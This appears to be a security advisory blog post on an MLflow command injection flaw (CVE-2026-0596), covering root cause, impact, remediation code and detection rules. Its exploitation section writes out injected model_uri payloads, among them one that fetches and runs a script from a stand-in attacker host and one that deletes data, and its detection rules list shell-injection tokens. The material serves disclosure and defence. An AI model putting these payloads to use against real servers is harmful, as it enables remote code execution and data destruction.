CVE-2026-0596: MLflow Command Injection via Unsanitized model_uri (CVSS 9.6)

Critical Security Alert

This vulnerability is actively being exploited. Immediate action is recommended.

SECURITY · CRITICAL · CVE-2026-0596

A critical command injection vulnerability in mlflow/mlflow allows attackers to execute arbitrary shell commands by embedding metacharacters in the model_uri parameter when serving models with MLServer enabled.

Dylan H.

Security Team

April 1, 2026
6 min read

Affected Products

  • mlflow/mlflow (all versions with enable_mlserver=True)

Executive Summary

A critical command injection vulnerability (CVE-2026-0596) has been identified in mlflow/mlflow, the widely deployed open-source machine learning lifecycle management platform. The flaw carries a CVSS score of 9.6 and is triggered when serving ML models using the enable_mlserver=True configuration flag.

The root cause is straightforward: the model_uri parameter is interpolated directly into a bash -c shell command without any sanitisation. An attacker who can influence the value of model_uri — for example, through a model registry, API call, or configuration input — can inject arbitrary shell metacharacters such as $() or backticks to achieve remote code execution on the host serving the model.

Any organisation running MLflow model serving with MLServer integration should treat this as an urgent patch priority, particularly in shared infrastructure, multi-tenant model serving environments, or pipelines that accept externally supplied model URIs.


Vulnerability Overview

Attribute               Value
CVE ID                  CVE-2026-0596
CVSS Score              9.6 (Critical)
CWE                     CWE-78 — Improper Neutralisation of Special Elements used in an OS Command
Type                    Command Injection / Remote Code Execution
Attack Vector           Network
Privileges Required     Low
User Interaction        None
Scope                   Changed
Confidentiality Impact  High
Integrity Impact        High
Availability Impact     High
Trigger Condition       enable_mlserver=True at serve time

Affected Versions

Component:          mlflow/mlflow
Affected condition: All versions — when serve() is called with enable_mlserver=True
Fixed version:      Pending / apply workaround

Technical Analysis

Root Cause

When MLflow is used to serve a model with the MLServer backend (enable_mlserver=True), the serving function constructs a shell command of the form:

bash -c "mlflow models serve -m <model_uri> --enable-mlserver ..."

The model_uri value is embedded directly into this command string without any escaping, quoting, or allowlist validation. This is a textbook CWE-78 (OS Command Injection) pattern.
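The difference between the two execution paths can be demonstrated safely, using echo as a stand-in for the real serve command and a benign payload in place of an attacker's:

```python
import subprocess

# A model_uri carrying a command-substitution payload (benign stand-in)
model_uri = "models:/mymodel/1$(echo INJECTED)"

# Vulnerable pattern: the URI is interpolated into a shell command string,
# so the shell expands $() before the target program ever runs
vuln = subprocess.run(
    f"echo serving {model_uri}", shell=True, capture_output=True, text=True
)
print(vuln.stdout.strip())   # serving models:/mymodel/1INJECTED

# Safe pattern: an argument list is passed to exec() directly; no shell
# parses the string, so the metacharacters stay literal
safe = subprocess.run(
    ["echo", "serving", model_uri], capture_output=True, text=True
)
print(safe.stdout.strip())   # serving models:/mymodel/1$(echo INJECTED)
```

In the vulnerable path the `$()` has already executed by the time the serving command runs, which is exactly what happens to the interpolated model_uri above.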

Exploitation

An attacker who controls or influences the model_uri value can inject shell metacharacters:

# Backtick injection
model_uri = "models:/mymodel/1`curl attacker.com/payload | bash`"
 
# Command substitution injection
model_uri = "models:/mymodel/1$(whoami > /tmp/pwned)"
 
# Semicolon-based chaining
model_uri = "models:/mymodel/1; rm -rf /critical/data"

Each of these patterns causes the injected command to execute in the context of the MLflow serving process — which in many deployments runs with service account or even root privileges.

Attack Surface

The attack surface is broader than it may initially appear:

  • Model Registry API: If an attacker can register a model with a malicious URI, serving any version of it will trigger execution
  • Automated pipelines: MLflow pipelines that auto-serve the latest registered model version are directly vulnerable
  • Multi-tenant environments: Platforms where multiple teams can register models are especially at risk
  • CI/CD integration: Pipelines that call mlflow models serve with dynamic URIs derived from external input

Impact Assessment

Impact Area             Description
Remote Code Execution   Arbitrary commands execute as the MLflow serving process user
Data Exfiltration       Access to training data, model artefacts, secrets, and environment variables
Lateral Movement        Shell access can be used to pivot to databases, cloud metadata endpoints, and internal services
Persistence             Attacker can install backdoors, cron jobs, or modified model files
Supply Chain Risk       Compromised model serving infrastructure can poison downstream predictions or data pipelines
Secrets Theft           Cloud provider credentials, MLflow tracking server tokens, and database URIs are commonly present as environment variables

Immediate Remediation

Step 1: Disable MLServer Integration Until Patched

# Do NOT use enable_mlserver=True until a patch is confirmed
mlflow models serve -m "models:/MyModel/1"
# Remove --enable-mlserver flag entirely

Step 2: Validate and Sanitise model_uri Inputs

If you must accept dynamic model_uri values, implement strict allowlist validation:

import re
 
# Accept only well-formed models:/, runs:/, or s3:// URIs — nothing else
SAFE_MODEL_URI_PATTERN = re.compile(
    r'^(models:/[a-zA-Z0-9_\-]+/[0-9]+'        # models:/<name>/<version>
    r'|runs:/[a-f0-9]{32}/[a-zA-Z0-9_/\-]+'    # runs:/<run_id>/<artifact_path>
    r'|s3://[a-zA-Z0-9._\-/]+)$'               # s3://<bucket>/<key>
)
 
def validate_model_uri(uri: str) -> str:
    if not SAFE_MODEL_URI_PATTERN.match(uri):
        raise ValueError(f"Unsafe model_uri rejected: {uri}")
    return uri
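As a sanity check, the allowlist can be exercised against the payloads from the exploitation section; the pattern is repeated below so the snippet runs standalone:

```python
import re

# Copy of the Step 2 allowlist, so this check is self-contained
SAFE_MODEL_URI_PATTERN = re.compile(
    r'^(models:/[a-zA-Z0-9_\-]+/[0-9]+'
    r'|runs:/[a-f0-9]{32}/[a-zA-Z0-9_/\-]+'
    r'|s3://[a-zA-Z0-9._\-/]+)$'
)

def validate_model_uri(uri: str) -> str:
    if not SAFE_MODEL_URI_PATTERN.match(uri):
        raise ValueError(f"Unsafe model_uri rejected: {uri}")
    return uri

# A well-formed URI passes through unchanged
assert validate_model_uri("models:/mymodel/1") == "models:/mymodel/1"

# Every payload from the exploitation section is rejected
for payload in [
    "models:/mymodel/1`curl attacker.com/payload | bash`",
    "models:/mymodel/1$(whoami > /tmp/pwned)",
    "models:/mymodel/1; rm -rf /critical/data",
]:
    try:
        validate_model_uri(payload)
        raise AssertionError("payload was not rejected")
    except ValueError:
        pass  # expected
```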

Step 3: Use subprocess with Argument Lists Instead of Shell

If you are customising MLflow or contributing a fix, the correct pattern is:

import subprocess
 
# INSECURE — DO NOT USE
subprocess.run(f"bash -c 'mlflow models serve -m {model_uri}'", shell=True)
 
# SECURE — argument list bypasses shell interpretation
subprocess.run(
    ["mlflow", "models", "serve", "-m", model_uri, "--enable-mlserver"],
    shell=False
)
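When a shell genuinely cannot be avoided (for example, the command is part of a larger pipeline string), the standard library's shlex.quote neutralises the metacharacters. This is a fallback sketch using echo as a stand-in, not a substitute for the argument-list form:

```python
import shlex
import subprocess

model_uri = "models:/mymodel/1$(whoami > /tmp/pwned)"

# shlex.quote wraps the value in single quotes, so the shell passes it
# through literally instead of expanding $()
cmd = f"echo mlflow models serve -m {shlex.quote(model_uri)}"
result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
print(result.stdout.strip())
# mlflow models serve -m models:/mymodel/1$(whoami > /tmp/pwned)
```

The payload survives as inert text; nothing is written to /tmp/pwned.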

Step 4: Run MLflow Serving with Minimal Privileges

# Create a dedicated service account
useradd -r -s /sbin/nologin mlflow-serve
 
# Run serving as that account
sudo -u mlflow-serve mlflow models serve -m "models:/MyModel/1"
 
# Or in Docker: drop all capabilities
docker run --cap-drop ALL --security-opt no-new-privileges mlflow-serving-image

Detection

Check for Active Exploitation Indicators

# Look for unexpected processes spawned by the mlflow serving process
ps auxf | grep mlflow
 
# Check for suspicious command execution in audit logs
ausearch -c bash --start today
 
# Review MLflow server access logs for unusual model_uri values
grep -E '\$\(|`|;.*bash|&&.*curl' /var/log/mlflow/serve.log
 
# Check for unexpected outbound connections from the serving host
ss -tnp | grep <mlflow-pid>
netstat -anp | grep ESTABLISHED | grep <mlflow-pid>

SIEM Detection Rule (Pseudocode)

rule: mlflow_command_injection_attempt
conditions:
  - process.name == "mlflow"
  - process.args contains any of ["$(", "`", "; bash", "&& curl", "| sh"]
  - event.type == "process_start"
severity: critical
response: alert + isolate
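The same rule can be expressed as a few lines of Python for ad-hoc scanning of historical process-start events. The event field names below are assumptions for illustration; map them to your SIEM's actual schema:

```python
SUSPICIOUS_TOKENS = ["$(", "`", "; bash", "&& curl", "| sh"]

def is_injection_attempt(event: dict) -> bool:
    """Flag mlflow process-start events whose arguments carry shell metacharacters."""
    if event.get("event_type") != "process_start":       # assumed field name
        return False
    if event.get("process_name") != "mlflow":            # assumed field name
        return False
    args = " ".join(event.get("process_args", []))       # assumed field name
    return any(token in args for token in SUSPICIOUS_TOKENS)

benign = {"event_type": "process_start", "process_name": "mlflow",
          "process_args": ["models", "serve", "-m", "models:/mymodel/1"]}
attack = {"event_type": "process_start", "process_name": "mlflow",
          "process_args": ["models", "serve", "-m", "models:/mymodel/1$(whoami)"]}

assert not is_injection_attempt(benign)
assert is_injection_attempt(attack)   # would drive the alert + isolate response
```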

Workarounds

Until an official patch is released:

  1. Disable MLServer integration — do not pass enable_mlserver=True to any serving call
  2. Restrict model_uri sources — only serve models whose URIs are constructed internally, never from user input
  3. Network-segment the serving host — block egress from the MLflow serving process to limit the blast radius of exploitation
  4. Enable audit logging — capture all shell executions on the serving host
  5. Run in a container with restricted capabilities — limit what an injected command can do

References

  • NVD — CVE-2026-0596
  • MLflow GitHub Repository
  • CWE-78 — Improper Neutralisation of Special Elements used in an OS Command
Tags: CVE-2026-0596, MLflow, Command Injection, Machine Learning Security, CWE-78, Shell Injection, MLServer

Related Articles

CVE-2025-15379: MLflow Command Injection in Model Serving (CVSS 10.0)

A maximum-severity command injection vulnerability in MLflow's model serving container initialization allows attackers to execute arbitrary OS commands via a maliciously crafted python_env.yaml dependency file when deploying models with env_manager=LOCAL.


CVE-2026-32238: Critical Command Injection in OpenEMR Backup Functionality

OpenEMR versions prior to 8.0.0.2 contain a CVSS 9.1 command injection vulnerability in the backup functionality. Authenticated attackers with high...


CVE-2025-15036: MLflow Path Traversal in Archive Extraction

A critical path traversal vulnerability in MLflow's extract_archive_to_dir function allows attackers to write arbitrary files outside the intended extraction directory via maliciously crafted tar archives. Affects all versions before v3.7.0.
